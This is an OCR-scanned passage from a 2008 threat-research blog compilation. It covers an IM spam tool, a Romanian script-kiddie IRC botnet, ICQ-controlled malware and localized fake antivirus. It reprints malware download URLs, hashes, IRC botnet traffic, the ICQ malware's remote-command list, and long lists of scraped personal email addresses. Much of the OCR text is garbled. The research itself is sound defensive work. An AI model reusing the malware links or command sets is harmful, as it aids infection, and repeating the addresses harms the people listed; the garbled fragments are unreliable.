and going to live exploit URLs automatically infecting with malware upon visiting them. 


There’re, however, two perspectives we should distinguish as seperate attack tactics, 
each of which requires a different set of expertise to conduct, as well as different entry barries 
to bypass to reach the efficiency stage. If you find this DIY type of tool’s efficiency disturbing 
in terms of the ease of use and its potential for soreading malware serving URLs, you should 
consider its logical super efficiency stage, namely [4]the use of botnets for SPIMMING. 


Will malware authors, looking for shorter time-to-infect lifecycles, try to replace email as 
infection vector of choice, with IM applications, which when combined with typosquatting and 
cybersquatting could result in faster infections based on impulsive social engineering attacks? 
Novice botnet masters looking for ways to set up the foundations of their botnet could, the 
pragmatic attacks will however, continue using the most efficient and reliable way to infect as 
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many people as possible, in the shortest timeframe achievable - [5]Jinjecting or [6]embedding 
malicious links at legitimate sites. 


Related posts: 

[7]Uncovering a MSN Social Engineering Scam 
[8]MSN Spamming Bot 

[9]DIY Fake MSN Client Stealing Passwords 
[10]Thousands of IM Screen Names in the Wild 
[11]Yahoo Messenger Controlled Malware 
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. http: //blog.spywareguide.com/2008/03/more_skype_spam_promoting rogu.html 

http: //skypejournal .com/blog/2008/03/the_skype_journal_evil_genius.html 

http: //ddanchev. blogspot .com/2007/10/dynamics-of-malware-industry. html 

http: //ddanchev. blogspot .com/2007/05/msn- spamming- bot . html 

http: //ddanchev. blogspot .com/2008/03/massive-iframe-seo-poisoning-attack. html 
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. http: //ddanchev. blogspot .com/2008/01/diy-fake-msn-client-stealing-passwords.html 
10. http: //ddanchev.blogspot .com/2007/10/thousands-of-im-screen-names-in-wild.html 
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4.4.8 Romanian Script Kiddies and the Screensavers Botnet (2008-04-08 10:17) 


TH) NoteamVs.un.. |) #madartakar 


«| AuSdkStuF 
Ck7zU18es 
Eatn036 
G13z251 
Ie3st43 
Ls8bY68xt 
Mi3d033 
Rk12K56 
Y¥kGhJ36 
Yusel38gu 


Shall we turn into zombies, and peek into the modest botnet courtesy of Romanian script 
kiddies, that are currently spamming postcard.scr greeting cards? Meet the script kiddies. 
This botnet is going nowhere mostly because knowing how to compile an IRC bot doesn’t 
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necessarily mean you posses a certain know-how, a know-how that [1]experienced botnet 
masters have been outsourcing for years. Malware is obtained through links pointing to : 


xhost.ro/filehost/phrame.php?action=saveDownload &fileld=15735 
xhost.ro/filehost/phrame.php?action=editDownload &fileld=12923 
xhost.ro/filehost/phrame.php?action=saveDownload &fileld=3656 

xhost.ro/filehost/phrame.php?action=editDownload &fileld=10936 


Scanners result : Result: 22/32 (68.75 %) 

Trojan.Zapchas.F; IRC/BackDoor.Flood; Backdoor.IRC.Zapchast 
File size: 735139 bytes 

MD5...: 015e5826084f2302b4b2c3237a62e244 

SHAI..: 7d05949f6dfffdc58033c9d8b86210a9bd34897c 


TH) UnderNet ahm... (7) #madartakar 


@Gaduasdu 
GAanmster 
@Aantonie 
@Bonifaciu 
@carrington 
@Ciofo 
@DhSkTg9iD 
@DhS1646peq2r 
@Disabled 
@Dragonul 
@dshdh 
GEo3thc4ne 


@loverult 
G@nmasalulover 
@nirun4ss4 


@Nz12U B4hkw6x 
@NasaGov 
|~ | @nevernore 


Sample traffic output : 

"NICK Mq2kC0O1 

USER las "" "pic.kauko.It" :Px7aW6 

USER las "" "Helsinki.Fl.EU.Undernet.org" :Px7aWw6 
USERHOST Mq2kC01 

NICK :Rk1zK50 

AWAY :Eu te scuip in cap si’n gura, tu ma pupi in cur si’n pula =))! 
MODE Mq2kCO1 +i 

ISON loverboy loveru SirDulce 

JOIN #madarfakar 

USER kzg "" "Helsinki.Fl.EU.Undernet.org" :Ho5x!1 
NICK :Vm3uF52 
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flo-the-king@web.de 
winter4ever03@hotmail.com 
killer2606@hotmail.co.uk 
devq.sub@gmail.com 

gedzac _xpload@hotmail.com 
codez11@gmail.com 
hacker@live.fr 
thaspl0iter@gmail.com 
flakcnon@gmail.com 
mahbbob@gmail.com 
psgchisolm@live.com 
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sOvv@hotmail.com 
gzin33@hotmail.com 

fire burnin 99@hotmail.com 
love.in.heavan@gmail.com 
daws.ask@gmail.com 
coolhoti@live.com 
aaronm007@web.de 
digitaloryan@gmail.com 
gamekings93@live.nl 

mach the h4x0r@hotmail.com 
mobbeam@hotmail.com 
bigbubbleboy999@yahoo.com 
itsjoey6969@aol.com 
info@oldskoolvinylrus.com 
smahood1@gmail.com 
rezagms@yahoo.com 

zwit 66@yahoo.com 
bullet963@net.hr 
administetua@gmail.com 
tom@condorcape.com 
mesmsgs@gmail.com 
owovincentl@yahoo.com 
viktor2667@hotmail.com 
nick69816@hotmail.com 

love came _first@hotmail.co.uk 
el.frakass@free.fr 
theworldisyours 45@hotmail.co.uk 
mks.1992@hotmail.com 
executerx@gmail.com 
sh-kesha@ya.ru 
djaksel@greenstarmusic.net 
prozhivchanin@gmail.com 
paeal5@yahoo.com 
anmeldung@crynetic.de 


prash1017@yahoo.com 
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medalord @hotmail.com 
the.bokii@gmail.com 
ahsankhatri1992@gmail.com 
dykol60@yahoo.com 
skania75@gmail.com 
kossilla@yahoo.fr 
methodman _1981@yahoo.it 
roellsoe@gmail.com 
jerryOO0786@yahoo.com 
wadhera69@hotmail.com 
willwork4beer@hotmail.co.uk 
n4v3d@yahoo.com 
81716100@qq.com 
aaa.hol@gmail.com 
cyberacte@hotmail.com 
lilnarak1989@hotmail.de 
mcrude@mcrude.nl 
marckirkland@hotmail.com 
counter23@hotmail.fr 
h-h@live.co.kr 
jpowers123@gmail.com 
maxmaximuss4@hotmail.com 
darkcats7@gmail.com 
pwned @hotmail.de 

ctc 2010@hotmail.com 
england khan@hotmail.com 
inbox _25@hotmail.com 
silverandreas@hotmail.com 
forcesdark@yahoo.com 
sniperx-x-x@azet.sk 
soulinux@gmail.com 
admin@darkcode.co.cc 

alwi loui@yahoo.com 
k4ligul4@gmail.com 
hwaide@gmail.com 
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anlar 012@hotmail.com 
fezz@live.com 
kusamochi@kusamochi.net 
pithayarma@gmail.com 
markusyoh@hotmail.com 
nissan350zpimp@gmail.com 
cafesuabmt@gmail.com 
isrk2006@yahoo.co.in 
joshgreaves@hotmail.com 
ashleymarie9007@yahoo.com 
uj@gmx.net 
www.nikolaus.thomas@gmx.de 
katinhetbakkiej@live.nl 
iamgod@hotmail.com 

black _water7@hotmail.com 
innocc@gmail.com 
dragons1960@gmail.com 
undraux@gmail.com 
duyhoa456@gmail.com 
h1it3m@sogetthis.com 

der _killer44@hotmail.de 
hancitgila@hotmail.com 
flamdugen@hotmail.com 
demircan1970@yahoo.co.uk 
big _thaw4@yahoo.com 
lucasandre 959@hotmail.com 
stuart.banner@ntlworld.com 
yuwatest@gmail.com 
gozac@live.com 
libyana.mikey@yahoo.com 
pe3sos@yahoo.com 
armaghetto@hotmail.com 
twiggytwig40@gmail.com 
spaydy2k2@hotmail.com 
xyz338351@yahoo.com 
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devuna@live.nl 
nautilus974@yahoo.com 
sharkspeed511@yahoo.es 
playamademexican92@yahoo.com 
sonicview8000hd@live.com 
mago@clubhacker.org 
chayenne.di.saliji@hotmail.com 
theycallmejimmy@yahoo.com 
ax-nova@live.co.uk 
flipsideO10@gmail.com 
abubackersa@aol.com 
nackgr@yahoo.gr 
blackgate@ipwar.ch 
jfu.justforu@yahoo.co.in 
rob33n@gmail.com 
h3xwannabe@hotmail.com 
zichlone@gmail.com 
alfrahi@msn.com 
workwolfy@gmail.com 
fenrisulfir@web.de 
johnburn@putera.com 
eaglestar27@gmail.com 
mikeross99@live.com 
hack3r@topmail.com 
blbassi@gmail.com 
kOrl30on@hotmail.com 
legalize.it@lycos.com 
iambehindyou223@aol.com 
tj007s13@gmail.com 
zambezey@yahoo.com 

el capo _grande@yahoo.com 
mcmillan.david@gmail.com 
kloftus@comcast.net 

cry castravete2003@yahoo.com 
khan@netscopebd.net 
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vampiremak@yahoo.com 
zion246@gmail.com 
nrush5041@yahoo.com 
soulsaver1958@gmail.com 
rock.skull@msn.com 
caprisonnen@hotmail.com 
slipknot4lyf222@hotmail.com 
eweeewew@trashymail.com 
smiqsmaq@gmail.com 
russo@iinet.net.au 
amor@epf.pl 
markpitts.mp3@gmail.com 
no-wares@hotmail.com 
0zzy32054@yahoo.com 
blackace77@gmail.com 
kaos 22@tiscali.co.uk 
flashl14@hotmail.de 


fasteliteprogrammer@yahoo.com 


niranjansarkar _tamu@hotmail.co.uk 


highscreen@gmx.net 

beejay xfs@yahoo.com 
bsdpunk@gmail.com 
archfourtytwo@gmail.com 
tim.345@hotmail.com 
hai2@yopmail.com 
nnsjoey@hushmail.com 

silent ninja _bob@hotmail.com 
pennytowel@yahoo.com 
anakhost@yahoo.com 

ask _prensi4040@hotmail.com 
waitec96@hotmail.com 
hoctun69@hotmail.com 
shadowrunner _mario@yahoo.de 
thunder-321@hotmail.com 


yourfunworld@gmail.com 
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gekystop@gmail.com 
yazifeather@gmail.com 
tonny _thuong@hotmail.com 
teetoo mod@hotmail.com 
jamie _983@hotmail.com 
dr.rOOt@hotmail.com 
gerardposada@hotmail.com 
silkhackzz@yahoo.com 
ckj8899@gmail.com 
weaklinks@msn.com 
albinoskunk101@hotmail.com 
madsheep@gmail.com 
pinam2@gmail.com 
albaiulla@web.de 

alt 69 98@yahoo.com 
waelbeso@hotmail.com 
mesic14@net.hr 

sugat x@hotmail.com 
gristhavoc@aol.com 

fear _martha@yahoo.com 
ircuzi@yahoo.com 
beefytaco@hotmail.com 
heaven@gbdesigns.com.au 
jafar_ 900@hotmail.com 
sebastian.hermann@live.de 
johnmaxwell3hq@hotmail.com 
smoke@iol.pt 
falcon846@gmail.com 
zeokat@gmail.com 
gonzo1234@hotmail.co.uk 
den eddy456@mailinator.com 
uk-nick@hotmail.co.uk 
cirux.arg@gmail.com 
earlc8451@clarkstate.edu 
tomasapinho@gmail.com 
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alumnoelectronico@hotmail.com 
micgenom@hotmail.it 

smalli_ 53@yahoo.com 
brazilsucks@hotmail.com 
theprOphet@sufferanddie.de 
rogueflamingo@gmail.com 
lolipedophine@gmail.com 
diskin8@hotmail.com 
psikopat.oflu@hotmail.com 
wowskul@hotmail.de 
aronstef@hotmail.com 
desfase2006@hotmail.com 
mr _robbin@yahoo.com 
jpilldev@gmail.com 
mickeyperfectol@yahoo.com 
la.fama@live.com 
malekmalek5@hotmail.com 
action9@gmail.com 
theOwner@rocketmail.com 
kazadOdum@gmail.com 
thetarheels@gmail.com 
gings113@hotmail.com 
mrkrypt777@yahoo.com 
unknown-g@hotmail.co.uk 
viral.parasite@hotmail.com 
alshikh@msn.com 
vasudev143@gmail.com 
synthtendo@live.com 
danzel@live.com 
philipk83@hotmail.com 
dvshaggarwal@gmail.com 
frederikdigetjensen@hotmail.com 
takalius@gmail.com 

hack 45@163.com 


djmistic93@gmail.com 
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romestar@gmail.com 
omfgusername@trash-mail.com 
rashibit@gmail.com 
cyber-terrorist@hotmail.com 
xyz.expart@gmail.com 
stampy29@thestampdown.com 
beng123pb@gmail.com 
chromepublic@live.com 
h4ckme123@gmail.com 

uli bad@yahoo.com 
abstracvision@yahoo.com 
bandit20@hotmail.com 

kuhnr _mofo@hotmail.com 
moesasin@aol.com 
vamsi.2600@gmail.com 
i0714850305@gmail.com 

leo phpguru@hotmail.com 
gogosds@gmail.com 
dr.rootkit@gmail.com 

hany _ahad@hotmail.com 
budhie73@gmail.com 
b4zzz@hotmail.com 
normstorm 5@yahoo.com 
bizzit@sys-flaw.com 
alkalimerol@mailinator.com 
georgew231w@mailinator.com 
bookwilliams@gmail.com 
syi2005s@163.com 

ssj street ninja@yahoo.com 
idigiti@gmail.com 
dlow@live.com 
pokerfacemail@walla.com 
rowanstewart32@hotmail.com 
teseduc@gmail.com 
cyber-cliff@inbox.com 

14072 


MODE Mq2kC0O1 +wx" 


And in next couple of hours, the most interesting domain that joined the IRC channel 
was: 


Ny2fW15 is [2]fwuser@mails.legislature.maine.gov * Kg1jT7 

Ny2fW15 on #madarfakar 

Ny2fW15 using Noteam.Vs.undernet.org I’m too lazy to edit ircd.conf 
Ny2fW15 is away: Eu te scuip in cap si’n gura, tu ma pupi in cur si’n pula =))! 
Ny2fW15 has been idle 1min 31secs, signed on Fri Apr 04 12:05:17 

Ny2fW15 End of /WHOIS list. 


This botnet’s futile attempt to scale is a great example of the growing importance of 
[3]knowlege and experience empowered botnet masters, as a key success factor for sustain- 
ability, and also, basic understanding of economic forces, namely, when they’re not making 
an investment there cannot be a return on investment on their efforts at the first place. Take 
a peek at [4]the efficiency level of remote file inclusion achieved by another botnet, and at 
[5]Jalternative botnet C &C channels courtesy of botnet masters realizing that diversity is vital. 


1. http: //ddanchev. blogspot .com/2008/03/loadsccs-ddos-for-hire-service.htm 


2. mailto:fwuser@mails.legislature.maine.go 
3. http: //ddanchev. blogspot .com/2007/10/botnet-on-demand-service.htm 


4. http: //ddanchev. blogspot .com/2007/07/sql-injection-through-search- engines. htm 


5. http: //ddanchev. blogspot .com/2007/03/botnet- communication-platforms.htm 


4.4.9 ICQ Messenger Controlled Malware (2008-04-14 13:50) 


aCTpoNKe x) 
= LB Genera 
TE Besonacnocts 
&} 3awura nporpe icin 
Gd Nowra 'closeadmin 
oe floru trun(nyte,napamerpe!) 
Gj Npoxen are 
Mj Donomurencwie + ledaie 
oe Nnerven Ishutdown 
Paspewera lemaillor Koro.Tema,TeKcT.aapec, Palin) 
Idel[patin) 
liprocess 
tkillpro[uma npouecca) 
Iskrin{1..100) 
thelp 
Hlogout 
tblock 
tunblock 
treadfile(c: \somefile. txt) 


KS] KS] ES YES] ES] CS |S] KS |S] ES] ES] CSS ICS ESS] 


KS) ES) KS )ES ES] ES |S] ES] ES] ES] ES] ES] ESS] CSCS 
KS] ES) CSCS CS YESS] ES] CSCS] CS] CSCS] CSC 


IM me a command, master - [1]part two. Diversifying the command and control channels 
of malware is always in a permanent development phrase, with malware authors trying to 
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mdchala@gmail.com 
evilgold@gmail.com 
zesthost@gmail.com 
likosabe@yahoo.com 
007stuntman@gmail.com 
gftesports@hotmail.de 
looking.2008@hotmail.com 
yo8ball1337@gmail.com 
jon2288@gmail.com 
so.cali5s62@yahoo.com 
mestic br@hotmail.com 
corleone.eof@gmail.com 
abar9073@bigpond.net.au 
marmondude101@yahoo.com 
vincentwulf@live.com 
asifmohtesham@gmail.com 
failcat@hotmail.com 
bloodmask2007@hotmail.com 
j _fbi@hotmail.com 
seppell8@hotmail.com 
sarig@012.net.il 
schepdar@gmail.com 
friend007123@gmail.com 
satelite server@yahoo.com 
zimox@ymail.com 
grimm.or.jow@gmail.com 
4realzer@gmail.com 
c00I-z3ro@hotmail.de 
newrival@yahoo.com 
matty@darkphoenixdesigns.co.uk 
anarchy.ang31@gmail.com 
ganapa2000@gmail.com 
egy spider@hotmail.com 
dan3424324@gmail.com 
web-master@rochester.rr.com 
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rtk217@gmail.com 
xLnixmzeng@live.co.uk 
h4x0r@inbox.com 
xeaton@gmail.com 
hion.or@gmail.com 
memberix1@yahoo.com 
strangeskye@gmail.com 
caton@no-log.org 

tribal shark@live.fr 
d-san775@hotmail.com 
vietpri3d@gmail.com 
gottis4@hotmail.com 
gfergusonuk@googlemail.com 
sedt.omry@gmail.com 

poor noodles@hotmail.com 
nou@nou.cc 
acquiremore@gmail.com 
khudsdu@gmail.com 
vladikvol@gmail.com 
codon8x.love@gmail.com 
smoke@mailinator.com 
chaabanel986@yahoo.fr 
kliendid@f-m.fm 
blagojce.public@gmail.com 
silverspeed @hotmail.com 
swipperl001@gmail.com 
willaimssnowdon@yahoo.com 
a-nihilist@error33.net 
trance337@gmail.com 
kennedy _usa27@hotmail.com 
p4nick@el-hacker.org 
zerosystem555@hotmail.com 
bently 246@hotmail.com 
upgr4d3@gmail.com 
player-woot@hotmail.com 
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adrian _psk@hotmail.com 
shkupjani83@hotmail.com 
led2002-stuff@yahoo.co.uk 
onkelt@gmail.com 
geniusarts@alice. it 
vingpark@gmail.com 
pman20@hotmail.com 
1010771556@qq.com 
jpccaldas@hotmail.com 
spuntz25@yahoo.com 
fOOma@yopmail.com 
canareccil7@msn.com 
halloduda@bugmenot.com 
chetcumaydi khakha@yahoo.com 
laftanza@gmail.com 

alexis 531@hotmail.fr 

zf aul@hotmail.com 
mani.warrior@yahoo.com 
leonardosouto _g@yahoo.com.br 
info@knbykl.org 
anop72@hotmail.com 
jtabeling@idpnow.net 
davidnasarski@live.de 
leestoner@hotmail.com 
californianetsolorio@hotmail.com 
vekemanssander@msn.com 
haxOr4life@hotmail.co.uk 
sazid _mohakhali@yahoo.com 
lani cracker@hotmail.de 
xcj101@gmail.com 
linkero.aodhosting@yahoo.com 
jamesduffy@myway.com 

wilby _tynan@hotmail.com 
dalamilove2006@yahoo.com 


meticall@netscape.net 
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sathyaprakash222@gmail.com 
futility91@gmail.com 
sariamon@hotmail.com 
yurikthejester@gmail.com 
devin27779@hotmail.com 
jimbobmagic@hotmail.com 
danilo.cvjeticanin@gmail.com 
partner56141205@aravensoft.com 
madbright@gmail.com 

muha _cs_kalish@hotmail.com 
jgrimm2@triad.rr.com 
xaviersantiago92@hotmail.com 
qq190994965@163.com 
modym27@yahoo.com 
kosmo8888@embarqmail.com 
shilpa4nsc@gmail.com 
falcunix@gmail.com 
newsomekid@gmail.com 
service@sbhns-1.net 
netnutri@gmail.com 

leader OO@hotmail.com 
bb01234567@gmail.com 
Ixhackl@gmail.com 
xddx11@yahoo.com 
rudeyute@gsmcrazy.co.uk 
ishan.tripathy@gmail.com 
bocapit@gmail.com 
gunman4life@gmail.com 
dftaker@yahoo.com 
ayaz619@hotmail.co.uk 
epsanahacks@yahoo.com 
gamespanka@gmail.com 
egypt-sniper@msn.com 
marc@fam-streckfuss.de 
ruaxer@gmail.com 
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livilrisam@yahoo.com 
kos6476@ya.ru 
razor90@hotmail.it 
hardik2990@gmail.com 
pkeyl@yahoo.com 
staker.38@gmail.com 
henrock913@optonline.net 
kevinlonber@yahoo.com 
destinyii@hotmail.com 
s.ricotti@tiscali.it 
pitmjO02@sogfl.org.uk 

farias 900@hotmail.com 
jnelsonl1989@gmail.com 
hc.clan@sbcglobal.net 
aceOfsp4d3s@gmail.com 
drkjoker@hotmail.it 
delincuentehard@gmail.com 
syncdoom@gmail.com 
advent _sepiroth@hotmail.com 
bl4ckcOd3x@gmail.com 
ararrafik@hotmail.com 
mmwasifsaeed@hotmail.com 
thesmallv@gmail.com 
tooymo@gmail.com 
dario.tornincasa@libero.it 
uss.thebug@gmail.com 
got-r00t@hotmail.fr 
erreterr@live.com 
loginrl.trash@gmail.com 
melvin-verpaalen@hotmail.com 
marko.fer@gmail.com 
lordoftheknight67@hotmail.com 
ketchup7 8@yahoo.com 
syntaxe.exe@gmail.com 


taylor _kyran@yahoo.com 
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c.c.m _hacker@hotmail.com 
bufffik@interia.eu 
willy123@sify.com 

david hew _87@hotmail.com 
tonya@punkass.com 
mac-1992@hotmail.com 
asilboy@msn.com 
sabas.sanchez@yahoo.com 
tlhafelo@yahoo.com 
staff-qa@hotmail.com 
nfrnusO9@gmail.com 
cheapbytz@yahoo.com 
besc@besc.at 
spee3d@inbox.com 
jdwillow@gmail.com 
packetborne@gmail.com 
fanaaforkatrina@gmail.com 
capelpablo@yahoo.com.ar 
mucman90@yahoo.com 
pvinnoo@mail.com 
grumbles@cryptomail.org 
bianconeri.36@gmail.com 
hajrry.007@hotmail.com 
xaxdxvaretal@live.com.pt 
mattycolridge@gmail.com 
napster2054@hotmail.de 
am.ialone@yahoo.co.in 
servicemhz@gmail.com 
gunnit514@hotmail.com 
stickmen@no-log.org 
cap3333@free.fr 
phillip.ulrich@web.de 
wind1in6s@yahoo.com 
kierandrain@btinternet.com 
semtex@teamnex.org 
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vetyver01@yahoo.com 
alex1273@hotmail.fr 
sam-22-79@hotmail.com 
dsordr@gmail.com 
romz08@hotmail.com 
jackryder01@yahoo.co.uk 
lily landslay@hotmail.fr 
anitapipitan@yahoo.com 
tukulesto@hackermail.com 
matheuscapa@hotmail.com 
Il.v.3.n.0.m.11}@gmail.com 
captencrunch@gmail.com 
jerrry.leee@gmail.com 
simonemarco94@yahoo.it 
enrique webg@live.com 
master.elautentico@gmail.com 
woollepg@hotmail.com 
igikoval@interia.eu 

shamus _aja@yahoo.co.id 
private483@laposte.net 
itachimacaco@gmail.com 
saick23@gmail.com 
roteroktober@uni.de 
mads.drange.pedersen@hotmail.com 
mininal849@hotmail.com 
drako359@hotmail.com 
flaeshal@bemaniso.ws 
mahmood3p2p@gmail.com 
heatseekerbunge@citadelstudios.net 
hahaha@spam.la 
keithleel979@gmail.com 
bubu28@ymail.com 
Inakxk@yahoo.com 
patrik5455@citromail.hu 


anyone420@gmail.com 
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turbo.420@hotmail.com 
zoey1014lyfe@aim.com 
thanossweet4@hotmail.com 
pox4u.com@gmail.com 
gmoustopoulos@yahoo.gr 
guessasb@gmail.com 
naveedakO0OO@yahoo.com 
faxxxx@libero.it 
Itucker7@gmail.com 

beatle typoons@yahoo.com 
dark.suffering@hotmail.com 
jloitalianblog@libero. it 
pmlaval@gmail.com 

ab _whynot@hotmail.com 
ntxploits@gmail.com 
tw2532007@hotmail.com 
squirrelchase@hotmail.com 
magesh _karthik@yahoo.co.in 
lol.sp.lol@gmail.com 
websiguranglas@gmail.com 
lootit@hotmail.com 

joe _ccrack@hotmail.com 
yoshi.sobek@yoshimail.de 
arnanseptian@gmail.com 
dakmar1@hotmail.com 
moddingdelux@hotmail.de 
member57078406@nybella.com 
subzero3@gmx.net 
bruno-banani-style-219@hotmail.de 
peterrobertsen@hotmail.com 
uplinkadminkenny@gmail.com 
joe.funny@gmail.com 
extreem.nach@gmail.com 
princessita ashley@hotmail.com 
cloudsdecending@gmail.com 
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vic@knows.that.your.mother.is.a.cheap.crackslut.org 


aukbiggums@live.com 
beefens@gmail.com 
h4x@mygO0t.com 
chakriappsdba@gmail.com 


datma _noob@yahoo.com 


mrtwister1337@googlemail.com 


davemorra@hotmail.com 
jachtopzichter@hotmail.com 
jayuO2@yahoo.com 
nurin-sahin@gmx.de 
1337security@gmail.com 
jamespalmer2005@aol.com 


ksa010ksa@gmail.com 


lombok _primitive@yahoo.co.id 


ffunk5@gmail.com 
doyourside@yahoo.com 
gandaftw@yahoo.com 

nerv _alk@hotmail.com 
www.benz1900@yahoo.com 
duabevnh@gmail.com 
calthodian@o2.co.uk 

tiago sousa25@hotmail.com 
accelerator _dd@yahoo.com 
lord.choldermort@gmail.com 
kirbyfree@gmail.com 
eldhawke@hotmail.com 
adammakarim@yahoo.com 
curt1zzle@gmail.com 
hadexito@gmail.com 
panosl2@hotmail.com 
infamouscraze@gmail.com 
platen 29@yahoo.com 
admin@killy.it 


alwayzdreamz@gmail.com 
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singapurajaya@yahoo.com.sg 
aznkidd235@hotmail.com 
jeffreyjozu@yahoo.com 
taymtaym18@yahoo.com 
sigex@hotmail.com 
phamOvanOtoan@gmail.com 
unknownstyler@gmail.com 
androidhun@citromail.hu 
nath _hostile@hotmail.co.uk 
concludent@darkmindz.com 
teamreloaded@hotmail.co.uk 
hc 88 hc@hotmail.com 
razer382@hotmail.com 
vova.podgornov@mail.ru 
tiudrink@gmail.com 
letrinh299@yahoo.com.vn 
pwnallnoobs@gmail.com 
devionicl@gmail.com 
flukats@gmail.com 
vanxo@live.no 
askegk@hotmail.com 
bahlv2002@yahoo.com 
deputamadre@safe-mail.net 
sh3ll.team@gmail.com 
pinandita@gmail.com 
illegaluserO01@googlemail.com 
dr.amr.oco@hotmail.com 
simon@molloys.org.uk 
gedlouko@gmail.com 
133t-@hotmail.com 
cikal.action@gmail.com 
g.costa@xplico.org 
mcbauer1992@gmx.de 
120x.an0n.140x@gmail.com 
cronocks@gmail.com 
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adapt their releases in order for them to bypass popular detection mechanisms. IM controlled 
malware is a great example of such a development, and now that I’ve already covered a Yahoo 
Messenger controlled malware in previous post, it would be logical to come up with more 
evidence on alternative IM networks used as a main C &C interface, such as ICQ in this case. 
The ICQ controlled malware’s pitch : 


- OxHo cooGmenHn (alex) 


messagethello) - Noka3saTb cooBwjeHHe. 

dir(c:\) - Nokasatb chatinb! B AMpeKTopun. 

closeadmin - BeiKnounTb AdminICO. 

run(nyTb)[Napametp {pexim} - Sanyck nporpamMbl.h-cKpbITbIM 3anyck, 
window - Nonyytb 3arOnoBokK aKTMBHOrO OKHa, 

admins - NonyyMtb cnMicok agMMHoe, 

shutdown - BbIKNOUMTb KOMNEHOTep. 
email(tema<>TeKcT)[Komy@oTnpaBnat.xx 1} yooooece.o0c- OTNpaBka NOUTEI, 
sound - Npovrpatb 3ByKOBOHM cbalin, yKaSaHHbIM B HACTpOMKaXx, 
delO<:\yoooosoa. eed) - ¥ganeHe cbarinoe, 

Iprocess - Nonyyvte cnvicoK 3anylWeHbIx MPOWeCcoB. 

killproGeceom,.exe) - SaBepLUMTb NpPOWecc. 
skrin¢€1,,.100) - Nonyyte CHAMOK 3KpaHa, 

help - TMctTHHr KomaH,. 


fo 628 Gaua 


"With this program, you will always be able to access the necessary functions of your computer 
using ordinary ICQ. It has the opportunity to add their scripts and commands, thus becoming 
a universal tool for controlling the computer - it all depends on your imagination and skills. 
Through the program operations like the following can be run by default - viewing directories, 
displaying messages, lauching programs, killing processes, shutdown, view active windows, 
and much more." 


Released primarily as a Proof of Concept, its source code is freely available which as 
[2]we’ve already seen in the past results in [3]more innovation added on behalf of those using 
the idea as a foundation for achieving their own malicious purposes. 
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Davin CnpasKa 
. (UU 2. IPUFIOULUSIG ULUFIURGA. | He tut tui 


£00:23:25/Nponsowna owMbkKa: File not found 
{00:26:52/Nponzowna owMbka: HepepHbid naponb 
00:35:39/ - AKTHBBH., 

00:39: 16: AKTHBBH. 

00:40:23 AKTMBEH. 


{00:40:33 . Bxog BbINONHEH. 

{00:41:11 : pMHato coobuyexne: hello 
00:41:27) - Mocnay 3ByKOBOH CHrHan. 
00:42:07. 3anpoc cnucka npoyeccos 
00:42:49; _ 3anpoc CHMMKa 3kKpaHa 
00:43:14 . Monbitka 3aBepwHTb npouecc: 


The whole concept of abusing third-party communication applications for malware purposes, 
has always been there, in fact two years ago, there were even speculations that [4]Skype could 
be used to control botnets. A fad or a trend? The lone malware author who’s not embracing 
malicious economies of scale and looking for reliable and efficient ways to infect and control 
as many hosts as possible, is taking advantage of this, the rest are always looking for ways 
to port their botnets to a different C &C without loosing a single host in order to benefit from 
what a web application C &C can provide in respect to the old-fashioned IRCd command line 
commands. 


1. http: //ddanchev. blogspot .com/2007/11/yahoo-messenger-controlled-malware .htm 
2. http: //ddanchev. blogspot .com/2007/09/localizing-open-source-malware.htm 


3. http: //ddanchev. blogspot .com/2007/09/custom-ddos-capabilities-within-malware.htm 


4. http: //ddanchev. blogspot .com/2006/01/skype-to-control-botnets.htm 
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djmirko90@hotmail.it 
e1l@hotmail.it 

edge 5/70@yahoo.com 
kendimicin@live.com 
tddupre@gmail.com 
lesnige229@msn.com 
zhou-tai-rs2u@hotmail.com 
freezevalid2007@gmail.com 
requestforcomments@hushmail.me 
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saketsrivastav79@gmail.com 
usserrr@yahoo.com 

x _userO0@lycos.com 
tuxwishful@gmail.com 
rahuls4u2@yahoo.co.in 
jimrocken@yahoo.com 
alph4@mail.ru 
ajulianrembert@gmail.com 
iaskquestionsalot@yahoo.com 
wiipeart@gmail.com 
digital.midway@gmail.com 
jhon4u2@yahoo.com 
macintard42@me.com 
dr.h4ck3rs@gmail.com 
cats123123@hotmail.com 
matteo the best91@hotmail.it 
paxnwo@yahoo.com 
acidOwnz@hotmail.de 
ragexz@gmail.com 

p.g _styler@hotmail.de 
murdock101@bugmenot.com 
mirphak.j@gmail.com 
abaue562@aim.com 
jackrussellterrier@fastmail.fm 
nikokolev2@gmail.com 
nothingnothingO0O00@gmail.com 
trojodka777@hotmail.com 
ghost-man@live.co.uk 
badkiddies@gmail.com 
point@stny.rr.com 
m3hd1@live.com 
hedg3hog@gmx.net 
the-matador@hotmail.co.uk 
hackshaun@gmail.com 


godfather frank@hotmail.com 


14101 


anarchy32391@gmail.com 
lovedoudou/77@live.fr 
iamkrupt@gmail.com 
jfcadena@gmail.com 

d3act __@hotmail.com 
slipperyhack@gmail.com 
przewodniczacy@gmail.com 
rolancross@gmail.com 
superbkmu@gmail.com 
todeskrieger@live.com 
legenda.elko@gmail.com 
bersebuk2k@gmail.com 
dommobile@gmail.com 
harley _ftw59@yahoo.com 
xenoglossi@yahoo.de 
kequaypha2001@yahoo.com 
zyxell9@yahoo.com 
admin@irist.ir 
digitalxyros@gmail.com 
human _abuse@hotmail.com 
voellsoftO2@yahoo.es 
cs.deviance@gmail.com 
homerrowsky@yahoo.com.mx 
agent59635946@spamcorptastic.com 
will718@fuse.net 
darkforce12345@hotmail.com 
wappy@evonet.ro 
macrobber18@gmail.com 
marocanul2004@yahoo.com 
odoreo@ymail.com 
spyware.1111@yahoo.com 
arcap2004@hotmail.com 
Ilendoll@gmail.com 
5can7ix@gmail.com 
nick@inetcentral.info 
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4.4.10 Localized Fake Security Software (2008-04-14 14:31) 


Sumejor. 


jPROTEJA AHORA SU PC 
CONTRA VIRUS! 
Liberacion de virus en 
linea 


weemee 
onenwtrnre 


ete 
¢f programa borracs todos e606 archivos a 
tsteme 


~ 


DESCARGAR AHORA 


Surrepotentvirus @60h Grigio & aQuesOS USUSrIOS Que LaDajan actvarnente Con su PC Sumejecantvrus est Girigido a 
Navegan por internet y por efo corren ef Nesp de ter infextados La presencia de virus Fa avelos usuarios que buscan 
PURGE PrOdurin Cartes PrODlemnas el sistema Gejare Oe fuNcionar, su informacién Protec chdn para sus Comp tacoras 
Oma datos de taretes Ge create serd sustaitay los popups No Gelarin Si ss a menudo se ve secteda 
for les ataques de virus y guEANOS 
ndormstcos O Si tus Ktidades en 
; internet son registadas, ertonces 
